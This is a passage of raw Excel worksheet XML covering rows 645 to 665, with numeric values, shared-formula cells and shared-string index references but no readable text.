      <c r="AB645" s="38" t="s">
        <v>2956</v>
      </c>
      <c r="AC645" s="40">
        <v>91250.0</v>
      </c>
      <c r="AD645" s="5"/>
      <c r="AE645" s="14"/>
      <c r="AF645" s="14"/>
    </row>
    <row r="646">
      <c r="A646" s="6">
        <f t="shared" si="1"/>
        <v>0.5719498911</v>
      </c>
      <c r="B646" s="29">
        <v>1.0</v>
      </c>
      <c r="C646" s="29">
        <v>24365.0</v>
      </c>
      <c r="D646" s="14"/>
      <c r="E646" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F646" s="14"/>
      <c r="G646" s="29">
        <v>4.0</v>
      </c>
      <c r="H646" s="29">
        <v>315.0</v>
      </c>
      <c r="I646" s="29">
        <v>1811.0</v>
      </c>
      <c r="J646" s="15"/>
      <c r="K646" s="15"/>
      <c r="L646" s="15"/>
      <c r="M646" s="15"/>
      <c r="N646" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O646" s="29">
        <v>5.0</v>
      </c>
      <c r="P646" s="29">
        <v>1.0</v>
      </c>
      <c r="Q646" s="15"/>
      <c r="R646" s="15"/>
      <c r="S646" s="15"/>
      <c r="T646" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U646" s="5"/>
      <c r="V646" s="5"/>
      <c r="W646" s="47"/>
      <c r="X646" s="45"/>
      <c r="Y646" s="45"/>
      <c r="Z646" s="38" t="s">
        <v>2957</v>
      </c>
      <c r="AA646" s="39" t="s">
        <v>2958</v>
      </c>
      <c r="AB646" s="38" t="s">
        <v>2959</v>
      </c>
      <c r="AC646" s="40">
        <v>24349.0</v>
      </c>
      <c r="AD646" s="5"/>
      <c r="AE646" s="14"/>
      <c r="AF646" s="14"/>
    </row>
    <row r="647">
      <c r="A647" s="6">
        <f t="shared" si="1"/>
        <v>0.02363226412</v>
      </c>
      <c r="B647" s="29">
        <v>1.0</v>
      </c>
      <c r="C647" s="29">
        <v>241658.0</v>
      </c>
      <c r="D647" s="14"/>
      <c r="E647" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F647" s="14"/>
      <c r="G647" s="29">
        <v>0.0</v>
      </c>
      <c r="H647" s="29">
        <v>267.0</v>
      </c>
      <c r="I647" s="29">
        <v>82973.0</v>
      </c>
      <c r="J647" s="15"/>
      <c r="K647" s="29">
        <v>6253.0</v>
      </c>
      <c r="L647" s="15"/>
      <c r="M647" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N647" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O647" s="29">
        <v>2.0</v>
      </c>
      <c r="P647" s="29">
        <v>4.0</v>
      </c>
      <c r="Q647" s="15"/>
      <c r="R647" s="15"/>
      <c r="S647" s="15"/>
      <c r="T647" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U647" s="5"/>
      <c r="V647" s="5"/>
      <c r="W647" s="47"/>
      <c r="X647" s="45"/>
      <c r="Y647" s="45"/>
      <c r="Z647" s="38" t="s">
        <v>2960</v>
      </c>
      <c r="AA647" s="39" t="s">
        <v>2961</v>
      </c>
      <c r="AB647" s="38" t="s">
        <v>2962</v>
      </c>
      <c r="AC647" s="40">
        <v>241632.0</v>
      </c>
      <c r="AD647" s="5"/>
      <c r="AE647" s="14"/>
      <c r="AF647" s="14"/>
    </row>
    <row r="648">
      <c r="A648" s="6">
        <f t="shared" si="1"/>
        <v>0.5451496458</v>
      </c>
      <c r="B648" s="29">
        <v>1.0</v>
      </c>
      <c r="C648" s="15"/>
      <c r="D648" s="14"/>
      <c r="E648" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F648" s="14"/>
      <c r="G648" s="29">
        <v>3.0</v>
      </c>
      <c r="H648" s="29">
        <v>103.0</v>
      </c>
      <c r="I648" s="29">
        <v>222479.0</v>
      </c>
      <c r="J648" s="15"/>
      <c r="K648" s="15"/>
      <c r="L648" s="15"/>
      <c r="M648" s="15"/>
      <c r="N648" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O648" s="29">
        <v>0.0</v>
      </c>
      <c r="P648" s="29">
        <v>0.0</v>
      </c>
      <c r="Q648" s="15"/>
      <c r="R648" s="15"/>
      <c r="S648" s="15"/>
      <c r="T648" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U648" s="5"/>
      <c r="V648" s="5"/>
      <c r="W648" s="47"/>
      <c r="X648" s="45"/>
      <c r="Y648" s="45"/>
      <c r="Z648" s="38" t="s">
        <v>2963</v>
      </c>
      <c r="AA648" s="39" t="s">
        <v>2964</v>
      </c>
      <c r="AB648" s="38" t="s">
        <v>2965</v>
      </c>
      <c r="AC648" s="40">
        <v>221985.0</v>
      </c>
      <c r="AD648" s="5"/>
      <c r="AE648" s="14"/>
      <c r="AF648" s="14"/>
    </row>
    <row r="649">
      <c r="A649" s="6">
        <f t="shared" si="1"/>
        <v>0.8834609362</v>
      </c>
      <c r="B649" s="29">
        <v>1.0</v>
      </c>
      <c r="C649" s="29">
        <v>31671.0</v>
      </c>
      <c r="D649" s="14"/>
      <c r="E649" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F649" s="14"/>
      <c r="G649" s="29">
        <v>3.0</v>
      </c>
      <c r="H649" s="29">
        <v>4016.0</v>
      </c>
      <c r="I649" s="29">
        <v>21291.0</v>
      </c>
      <c r="J649" s="15"/>
      <c r="K649" s="15"/>
      <c r="L649" s="15"/>
      <c r="M649" s="15"/>
      <c r="N649" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O649" s="29">
        <v>4.0</v>
      </c>
      <c r="P649" s="29">
        <v>4.0</v>
      </c>
      <c r="Q649" s="15"/>
      <c r="R649" s="15"/>
      <c r="S649" s="15"/>
      <c r="T649" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U649" s="5"/>
      <c r="V649" s="5"/>
      <c r="W649" s="47"/>
      <c r="X649" s="45"/>
      <c r="Y649" s="45"/>
      <c r="Z649" s="38" t="s">
        <v>2966</v>
      </c>
      <c r="AA649" s="39" t="s">
        <v>2967</v>
      </c>
      <c r="AB649" s="38" t="s">
        <v>2968</v>
      </c>
      <c r="AC649" s="40">
        <v>31667.0</v>
      </c>
      <c r="AD649" s="5"/>
      <c r="AE649" s="14"/>
      <c r="AF649" s="14"/>
    </row>
    <row r="650">
      <c r="A650" s="6">
        <f t="shared" si="1"/>
        <v>0.9316685681</v>
      </c>
      <c r="B650" s="29">
        <v>1.0</v>
      </c>
      <c r="C650" s="29">
        <v>123528.0</v>
      </c>
      <c r="D650" s="14"/>
      <c r="E650" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F650" s="14"/>
      <c r="G650" s="29">
        <v>2.0</v>
      </c>
      <c r="H650" s="29">
        <v>1156.0</v>
      </c>
      <c r="I650" s="29">
        <v>110039.0</v>
      </c>
      <c r="J650" s="15"/>
      <c r="K650" s="29">
        <v>110039.0</v>
      </c>
      <c r="L650" s="15"/>
      <c r="M650" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N650" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O650" s="29">
        <v>1.0</v>
      </c>
      <c r="P650" s="29">
        <v>8.0</v>
      </c>
      <c r="Q650" s="15"/>
      <c r="R650" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S650" s="15"/>
      <c r="T650" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U650" s="5"/>
      <c r="V650" s="5"/>
      <c r="W650" s="47"/>
      <c r="X650" s="45"/>
      <c r="Y650" s="45"/>
      <c r="Z650" s="38" t="s">
        <v>2969</v>
      </c>
      <c r="AA650" s="39" t="s">
        <v>2970</v>
      </c>
      <c r="AB650" s="38" t="s">
        <v>299</v>
      </c>
      <c r="AC650" s="40">
        <v>123519.0</v>
      </c>
      <c r="AD650" s="5"/>
      <c r="AE650" s="14"/>
      <c r="AF650" s="14"/>
    </row>
    <row r="651">
      <c r="A651" s="6">
        <f t="shared" si="1"/>
        <v>0.8945429677</v>
      </c>
      <c r="B651" s="29">
        <v>1.0</v>
      </c>
      <c r="C651" s="29">
        <v>121586.0</v>
      </c>
      <c r="D651" s="14"/>
      <c r="E651" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F651" s="14"/>
      <c r="G651" s="29">
        <v>3.0</v>
      </c>
      <c r="H651" s="29">
        <v>35299.0</v>
      </c>
      <c r="I651" s="29">
        <v>108615.0</v>
      </c>
      <c r="J651" s="15"/>
      <c r="K651" s="29">
        <v>108615.0</v>
      </c>
      <c r="L651" s="15"/>
      <c r="M651" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N651" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O651" s="29">
        <v>2.0</v>
      </c>
      <c r="P651" s="29">
        <v>0.0</v>
      </c>
      <c r="Q651" s="15"/>
      <c r="R651" s="15"/>
      <c r="S651" s="15"/>
      <c r="T651" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U651" s="5"/>
      <c r="V651" s="5"/>
      <c r="W651" s="47"/>
      <c r="X651" s="45"/>
      <c r="Y651" s="45"/>
      <c r="Z651" s="38" t="s">
        <v>2971</v>
      </c>
      <c r="AA651" s="39" t="s">
        <v>2972</v>
      </c>
      <c r="AB651" s="38" t="s">
        <v>2973</v>
      </c>
      <c r="AC651" s="40">
        <v>121585.0</v>
      </c>
      <c r="AD651" s="5"/>
      <c r="AE651" s="14"/>
      <c r="AF651" s="14"/>
    </row>
    <row r="652">
      <c r="A652" s="6">
        <f t="shared" si="1"/>
        <v>0.7020415619</v>
      </c>
      <c r="B652" s="29">
        <v>1.0</v>
      </c>
      <c r="C652" s="15"/>
      <c r="D652" s="14"/>
      <c r="E652" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F652" s="14"/>
      <c r="G652" s="29">
        <v>1.0</v>
      </c>
      <c r="H652" s="29">
        <v>249.0</v>
      </c>
      <c r="I652" s="29">
        <v>219422.0</v>
      </c>
      <c r="J652" s="15"/>
      <c r="K652" s="29">
        <v>83382.0</v>
      </c>
      <c r="L652" s="15"/>
      <c r="M652" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N652" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O652" s="29">
        <v>1.0</v>
      </c>
      <c r="P652" s="29">
        <v>2.0</v>
      </c>
      <c r="Q652" s="15"/>
      <c r="R652" s="15"/>
      <c r="S652" s="15"/>
      <c r="T652" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U652" s="5"/>
      <c r="V652" s="5"/>
      <c r="W652" s="47"/>
      <c r="X652" s="45"/>
      <c r="Y652" s="45"/>
      <c r="Z652" s="38" t="s">
        <v>2974</v>
      </c>
      <c r="AA652" s="39" t="s">
        <v>2975</v>
      </c>
      <c r="AB652" s="38" t="s">
        <v>2976</v>
      </c>
      <c r="AC652" s="40">
        <v>219317.0</v>
      </c>
      <c r="AD652" s="5"/>
      <c r="AE652" s="14"/>
      <c r="AF652" s="14"/>
    </row>
    <row r="653">
      <c r="A653" s="6">
        <f t="shared" si="1"/>
        <v>0.4314792585</v>
      </c>
      <c r="B653" s="29">
        <v>1.0</v>
      </c>
      <c r="C653" s="29">
        <v>93457.0</v>
      </c>
      <c r="D653" s="14"/>
      <c r="E653" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F653" s="14"/>
      <c r="G653" s="29">
        <v>16.0</v>
      </c>
      <c r="H653" s="29">
        <v>6799.0</v>
      </c>
      <c r="I653" s="29">
        <v>80591.0</v>
      </c>
      <c r="J653" s="15"/>
      <c r="K653" s="29">
        <v>19837.0</v>
      </c>
      <c r="L653" s="15"/>
      <c r="M653" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N653" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O653" s="29">
        <v>1.0</v>
      </c>
      <c r="P653" s="29">
        <v>2.0</v>
      </c>
      <c r="Q653" s="15"/>
      <c r="R653" s="15"/>
      <c r="S653" s="15"/>
      <c r="T653" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U653" s="5"/>
      <c r="V653" s="5"/>
      <c r="W653" s="47"/>
      <c r="X653" s="45"/>
      <c r="Y653" s="45"/>
      <c r="Z653" s="38" t="s">
        <v>2977</v>
      </c>
      <c r="AA653" s="39" t="s">
        <v>2978</v>
      </c>
      <c r="AB653" s="38" t="s">
        <v>2979</v>
      </c>
      <c r="AC653" s="40">
        <v>93455.0</v>
      </c>
      <c r="AD653" s="5"/>
      <c r="AE653" s="14"/>
      <c r="AF653" s="14"/>
    </row>
    <row r="654">
      <c r="A654" s="6">
        <f t="shared" si="1"/>
        <v>0.3537998854</v>
      </c>
      <c r="B654" s="29">
        <v>1.0</v>
      </c>
      <c r="C654" s="29">
        <v>31351.0</v>
      </c>
      <c r="D654" s="14"/>
      <c r="E654" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F654" s="14"/>
      <c r="G654" s="29">
        <v>8.0</v>
      </c>
      <c r="H654" s="29">
        <v>938.0</v>
      </c>
      <c r="I654" s="29">
        <v>21093.0</v>
      </c>
      <c r="J654" s="15"/>
      <c r="K654" s="29">
        <v>21093.0</v>
      </c>
      <c r="L654" s="15"/>
      <c r="M654" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N654" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O654" s="29">
        <v>2.0</v>
      </c>
      <c r="P654" s="29">
        <v>3.0</v>
      </c>
      <c r="Q654" s="15"/>
      <c r="R654" s="15"/>
      <c r="S654" s="15"/>
      <c r="T654" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U654" s="5"/>
      <c r="V654" s="5"/>
      <c r="W654" s="47"/>
      <c r="X654" s="45"/>
      <c r="Y654" s="45"/>
      <c r="Z654" s="38" t="s">
        <v>2980</v>
      </c>
      <c r="AA654" s="39" t="s">
        <v>2981</v>
      </c>
      <c r="AB654" s="38" t="s">
        <v>2982</v>
      </c>
      <c r="AC654" s="40">
        <v>31350.0</v>
      </c>
      <c r="AD654" s="5"/>
      <c r="AE654" s="14"/>
      <c r="AF654" s="14"/>
    </row>
    <row r="655">
      <c r="A655" s="6">
        <f t="shared" si="1"/>
        <v>0.5851352547</v>
      </c>
      <c r="B655" s="29">
        <v>1.0</v>
      </c>
      <c r="C655" s="15"/>
      <c r="D655" s="14"/>
      <c r="E655" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F655" s="14"/>
      <c r="G655" s="29">
        <v>2.0</v>
      </c>
      <c r="H655" s="29">
        <v>580.0</v>
      </c>
      <c r="I655" s="29">
        <v>107683.0</v>
      </c>
      <c r="J655" s="15"/>
      <c r="K655" s="15"/>
      <c r="L655" s="15"/>
      <c r="M655" s="14"/>
      <c r="N655" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O655" s="29">
        <v>1.0</v>
      </c>
      <c r="P655" s="29">
        <v>1.0</v>
      </c>
      <c r="Q655" s="15"/>
      <c r="R655" s="15"/>
      <c r="S655" s="15"/>
      <c r="T655" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U655" s="5"/>
      <c r="V655" s="5"/>
      <c r="W655" s="47"/>
      <c r="X655" s="45"/>
      <c r="Y655" s="45"/>
      <c r="Z655" s="38" t="s">
        <v>2983</v>
      </c>
      <c r="AA655" s="39" t="s">
        <v>2984</v>
      </c>
      <c r="AB655" s="38" t="s">
        <v>2985</v>
      </c>
      <c r="AC655" s="40">
        <v>200874.0</v>
      </c>
      <c r="AD655" s="5"/>
      <c r="AE655" s="14"/>
      <c r="AF655" s="14"/>
    </row>
    <row r="656">
      <c r="A656" s="6">
        <f t="shared" si="1"/>
        <v>0.1089013146</v>
      </c>
      <c r="B656" s="29">
        <v>1.0</v>
      </c>
      <c r="C656" s="29">
        <v>111853.0</v>
      </c>
      <c r="D656" s="14"/>
      <c r="E656" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F656" s="14"/>
      <c r="G656" s="29">
        <v>6.0</v>
      </c>
      <c r="H656" s="29">
        <v>568.0</v>
      </c>
      <c r="I656" s="29">
        <v>98346.0</v>
      </c>
      <c r="J656" s="15"/>
      <c r="K656" s="29">
        <v>6253.0</v>
      </c>
      <c r="L656" s="15"/>
      <c r="M656" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N656" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O656" s="29">
        <v>2.0</v>
      </c>
      <c r="P656" s="29">
        <v>0.0</v>
      </c>
      <c r="Q656" s="15"/>
      <c r="R656" s="15"/>
      <c r="S656" s="15"/>
      <c r="T656" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U656" s="5"/>
      <c r="V656" s="5"/>
      <c r="W656" s="47"/>
      <c r="X656" s="45"/>
      <c r="Y656" s="45"/>
      <c r="Z656" s="38" t="s">
        <v>2986</v>
      </c>
      <c r="AA656" s="39" t="s">
        <v>2987</v>
      </c>
      <c r="AB656" s="38" t="s">
        <v>2988</v>
      </c>
      <c r="AC656" s="40">
        <v>111852.0</v>
      </c>
      <c r="AD656" s="5"/>
      <c r="AE656" s="14"/>
      <c r="AF656" s="14"/>
    </row>
    <row r="657">
      <c r="A657" s="6">
        <f t="shared" si="1"/>
        <v>0.3040455667</v>
      </c>
      <c r="B657" s="29">
        <v>1.0</v>
      </c>
      <c r="C657" s="14"/>
      <c r="D657" s="14"/>
      <c r="E657" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F657" s="14"/>
      <c r="G657" s="29">
        <v>26.0</v>
      </c>
      <c r="H657" s="29">
        <v>3246.0</v>
      </c>
      <c r="I657" s="29">
        <v>151440.0</v>
      </c>
      <c r="J657" s="15"/>
      <c r="K657" s="29">
        <v>-1.0</v>
      </c>
      <c r="L657" s="15"/>
      <c r="M657" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N657" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O657" s="29">
        <v>3.0</v>
      </c>
      <c r="P657" s="29">
        <v>6.0</v>
      </c>
      <c r="Q657" s="15"/>
      <c r="R657" s="15"/>
      <c r="S657" s="15"/>
      <c r="T657" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U657" s="5"/>
      <c r="V657" s="5"/>
      <c r="W657" s="47"/>
      <c r="X657" s="45"/>
      <c r="Y657" s="45"/>
      <c r="Z657" s="38" t="s">
        <v>2989</v>
      </c>
      <c r="AA657" s="39" t="s">
        <v>2990</v>
      </c>
      <c r="AB657" s="38" t="s">
        <v>2991</v>
      </c>
      <c r="AC657" s="40">
        <v>179756.0</v>
      </c>
      <c r="AD657" s="5"/>
      <c r="AE657" s="14"/>
      <c r="AF657" s="14"/>
    </row>
    <row r="658">
      <c r="A658" s="6">
        <f t="shared" si="1"/>
        <v>0.7313201454</v>
      </c>
      <c r="B658" s="29">
        <v>1.0</v>
      </c>
      <c r="C658" s="29">
        <v>158638.0</v>
      </c>
      <c r="D658" s="14"/>
      <c r="E658" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F658" s="14"/>
      <c r="G658" s="29">
        <v>4.0</v>
      </c>
      <c r="H658" s="29">
        <v>260.0</v>
      </c>
      <c r="I658" s="29">
        <v>111889.0</v>
      </c>
      <c r="J658" s="15"/>
      <c r="K658" s="15"/>
      <c r="L658" s="15"/>
      <c r="M658" s="15"/>
      <c r="N658" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O658" s="29">
        <v>1.0</v>
      </c>
      <c r="P658" s="29">
        <v>2.0</v>
      </c>
      <c r="Q658" s="15"/>
      <c r="R658" s="15"/>
      <c r="S658" s="15"/>
      <c r="T658" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U658" s="5"/>
      <c r="V658" s="5"/>
      <c r="W658" s="47"/>
      <c r="X658" s="45"/>
      <c r="Y658" s="45"/>
      <c r="Z658" s="38" t="s">
        <v>2992</v>
      </c>
      <c r="AA658" s="39" t="s">
        <v>2993</v>
      </c>
      <c r="AB658" s="38" t="s">
        <v>2994</v>
      </c>
      <c r="AC658" s="40">
        <v>158626.0</v>
      </c>
      <c r="AD658" s="5"/>
      <c r="AE658" s="14"/>
      <c r="AF658" s="14"/>
    </row>
    <row r="659">
      <c r="A659" s="6">
        <f t="shared" si="1"/>
        <v>0.6059644301</v>
      </c>
      <c r="B659" s="29">
        <v>1.0</v>
      </c>
      <c r="C659" s="15"/>
      <c r="D659" s="14"/>
      <c r="E659" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F659" s="14"/>
      <c r="G659" s="29">
        <v>0.0</v>
      </c>
      <c r="H659" s="29">
        <v>943.0</v>
      </c>
      <c r="I659" s="29">
        <v>256263.0</v>
      </c>
      <c r="J659" s="15"/>
      <c r="K659" s="29">
        <v>6253.0</v>
      </c>
      <c r="L659" s="15"/>
      <c r="M659" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N659" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O659" s="29">
        <v>1.0</v>
      </c>
      <c r="P659" s="29">
        <v>6.0</v>
      </c>
      <c r="Q659" s="15"/>
      <c r="R659" s="15"/>
      <c r="S659" s="15"/>
      <c r="T659" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U659" s="5"/>
      <c r="V659" s="5"/>
      <c r="W659" s="47"/>
      <c r="X659" s="45"/>
      <c r="Y659" s="45"/>
      <c r="Z659" s="38" t="s">
        <v>2995</v>
      </c>
      <c r="AA659" s="39" t="s">
        <v>2996</v>
      </c>
      <c r="AB659" s="38" t="s">
        <v>2997</v>
      </c>
      <c r="AC659" s="40">
        <v>248774.0</v>
      </c>
      <c r="AD659" s="5"/>
      <c r="AE659" s="14"/>
      <c r="AF659" s="14"/>
    </row>
    <row r="660">
      <c r="A660" s="6">
        <f t="shared" si="1"/>
        <v>0.3777404763</v>
      </c>
      <c r="B660" s="29">
        <v>1.0</v>
      </c>
      <c r="C660" s="29">
        <v>188624.0</v>
      </c>
      <c r="D660" s="14"/>
      <c r="E660" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F660" s="14"/>
      <c r="G660" s="29">
        <v>3.0</v>
      </c>
      <c r="H660" s="29">
        <v>1293.0</v>
      </c>
      <c r="I660" s="29">
        <v>91044.0</v>
      </c>
      <c r="J660" s="15"/>
      <c r="K660" s="29">
        <v>6253.0</v>
      </c>
      <c r="L660" s="15"/>
      <c r="M660" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N660" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O660" s="29">
        <v>2.0</v>
      </c>
      <c r="P660" s="29">
        <v>0.0</v>
      </c>
      <c r="Q660" s="15"/>
      <c r="R660" s="15"/>
      <c r="S660" s="15"/>
      <c r="T660" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U660" s="5"/>
      <c r="V660" s="5"/>
      <c r="W660" s="47"/>
      <c r="X660" s="45"/>
      <c r="Y660" s="45"/>
      <c r="Z660" s="38" t="s">
        <v>2998</v>
      </c>
      <c r="AA660" s="39" t="s">
        <v>2999</v>
      </c>
      <c r="AB660" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC660" s="40">
        <v>188623.0</v>
      </c>
      <c r="AD660" s="5"/>
      <c r="AE660" s="14"/>
      <c r="AF660" s="14"/>
    </row>
    <row r="661">
      <c r="A661" s="6">
        <f t="shared" si="1"/>
        <v>0.8529900272</v>
      </c>
      <c r="B661" s="29">
        <v>1.0</v>
      </c>
      <c r="C661" s="29">
        <v>59525.0</v>
      </c>
      <c r="D661" s="14"/>
      <c r="E661" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F661" s="14"/>
      <c r="G661" s="29">
        <v>3.0</v>
      </c>
      <c r="H661" s="29">
        <v>2475.0</v>
      </c>
      <c r="I661" s="29">
        <v>2379.0</v>
      </c>
      <c r="J661" s="15"/>
      <c r="K661" s="29">
        <v>2379.0</v>
      </c>
      <c r="L661" s="15"/>
      <c r="M661" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N661" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O661" s="29">
        <v>7.0</v>
      </c>
      <c r="P661" s="29">
        <v>3.0</v>
      </c>
      <c r="Q661" s="15"/>
      <c r="R661" s="15"/>
      <c r="S661" s="15"/>
      <c r="T661" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U661" s="5"/>
      <c r="V661" s="5"/>
      <c r="W661" s="47"/>
      <c r="X661" s="45"/>
      <c r="Y661" s="45"/>
      <c r="Z661" s="38" t="s">
        <v>3000</v>
      </c>
      <c r="AA661" s="39" t="s">
        <v>3001</v>
      </c>
      <c r="AB661" s="38" t="s">
        <v>3002</v>
      </c>
      <c r="AC661" s="40">
        <v>59517.0</v>
      </c>
      <c r="AD661" s="5"/>
      <c r="AE661" s="14"/>
      <c r="AF661" s="14"/>
    </row>
    <row r="662">
      <c r="A662" s="6">
        <f t="shared" si="1"/>
        <v>0.4656800083</v>
      </c>
      <c r="B662" s="29">
        <v>1.0</v>
      </c>
      <c r="C662" s="29">
        <v>25262.0</v>
      </c>
      <c r="D662" s="14"/>
      <c r="E662" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F662" s="14"/>
      <c r="G662" s="29">
        <v>8.0</v>
      </c>
      <c r="H662" s="29">
        <v>1018.0</v>
      </c>
      <c r="I662" s="29">
        <v>16933.0</v>
      </c>
      <c r="J662" s="15"/>
      <c r="K662" s="29">
        <v>396.0</v>
      </c>
      <c r="L662" s="15"/>
      <c r="M662" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N662" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O662" s="29">
        <v>4.0</v>
      </c>
      <c r="P662" s="29">
        <v>8.0</v>
      </c>
      <c r="Q662" s="15"/>
      <c r="R662" s="15"/>
      <c r="S662" s="15"/>
      <c r="T662" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U662" s="5"/>
      <c r="V662" s="5"/>
      <c r="W662" s="47"/>
      <c r="X662" s="45"/>
      <c r="Y662" s="45"/>
      <c r="Z662" s="38" t="s">
        <v>3003</v>
      </c>
      <c r="AA662" s="39" t="s">
        <v>3004</v>
      </c>
      <c r="AB662" s="38" t="s">
        <v>3005</v>
      </c>
      <c r="AC662" s="40">
        <v>25260.0</v>
      </c>
      <c r="AD662" s="5"/>
      <c r="AE662" s="14"/>
      <c r="AF662" s="14"/>
    </row>
    <row r="663">
      <c r="A663" s="6">
        <f t="shared" si="1"/>
        <v>0.8231954889</v>
      </c>
      <c r="B663" s="29">
        <v>1.0</v>
      </c>
      <c r="C663" s="29">
        <v>110401.0</v>
      </c>
      <c r="D663" s="14"/>
      <c r="E663" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F663" s="14"/>
      <c r="G663" s="29">
        <v>1.0</v>
      </c>
      <c r="H663" s="29">
        <v>336.0</v>
      </c>
      <c r="I663" s="29">
        <v>83603.0</v>
      </c>
      <c r="J663" s="15"/>
      <c r="K663" s="15"/>
      <c r="L663" s="15"/>
      <c r="M663" s="14"/>
      <c r="N663" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O663" s="29">
        <v>1.0</v>
      </c>
      <c r="P663" s="29">
        <v>0.0</v>
      </c>
      <c r="Q663" s="15"/>
      <c r="R663" s="15"/>
      <c r="S663" s="15"/>
      <c r="T663" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U663" s="5"/>
      <c r="V663" s="5"/>
      <c r="W663" s="47"/>
      <c r="X663" s="45"/>
      <c r="Y663" s="45"/>
      <c r="Z663" s="38" t="s">
        <v>3006</v>
      </c>
      <c r="AA663" s="39" t="s">
        <v>3007</v>
      </c>
      <c r="AB663" s="38" t="s">
        <v>1537</v>
      </c>
      <c r="AC663" s="40">
        <v>110396.0</v>
      </c>
      <c r="AD663" s="5"/>
      <c r="AE663" s="14"/>
      <c r="AF663" s="14"/>
    </row>
    <row r="664">
      <c r="A664" s="6">
        <f t="shared" si="1"/>
        <v>0.3262434983</v>
      </c>
      <c r="B664" s="29">
        <v>1.0</v>
      </c>
      <c r="C664" s="14"/>
      <c r="D664" s="14"/>
      <c r="E664" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F664" s="14"/>
      <c r="G664" s="29">
        <v>2.0</v>
      </c>
      <c r="H664" s="29">
        <v>583.0</v>
      </c>
      <c r="I664" s="29">
        <v>33020.0</v>
      </c>
      <c r="J664" s="15"/>
      <c r="K664" s="15"/>
      <c r="L664" s="15"/>
      <c r="M664" s="15"/>
      <c r="N664" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O664" s="29">
        <v>1.0</v>
      </c>
      <c r="P664" s="29">
        <v>0.0</v>
      </c>
      <c r="Q664" s="15"/>
      <c r="R664" s="15"/>
      <c r="S664" s="15"/>
      <c r="T664" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U664" s="5"/>
      <c r="V664" s="5"/>
      <c r="W664" s="47"/>
      <c r="X664" s="45"/>
      <c r="Y664" s="45"/>
      <c r="Z664" s="38" t="s">
        <v>3008</v>
      </c>
      <c r="AA664" s="39" t="s">
        <v>3009</v>
      </c>
      <c r="AB664" s="38" t="s">
        <v>3010</v>
      </c>
      <c r="AC664" s="40">
        <v>45446.0</v>
      </c>
      <c r="AD664" s="5"/>
      <c r="AE664" s="14"/>
      <c r="AF664" s="14"/>
    </row>
    <row r="665">
      <c r="A665" s="6">
        <f t="shared" si="1"/>
        <v>0.6635717677</v>
      </c>
      <c r="B665" s="29">
        <v>1.0</v>
      </c>
      <c r="C665" s="14"/>
      <c r="D665" s="14"/>
      <c r="E665" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F665" s="14"/>
      <c r="G665" s="29">
        <v>1.0</v>
      </c>
      <c r="H665" s="29">
        <v>5395.0</v>
      </c>
      <c r="I665" s="29">
        <v>66988.0</v>
      </c>
      <c r="J665" s="15"/>
      <c r="K665" s="29">
        <v>6253.0</v>
      </c>
      <c r="L665" s="15"/>
      <c r="M665" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N665" s="36" t="s">
        <v>30</v>
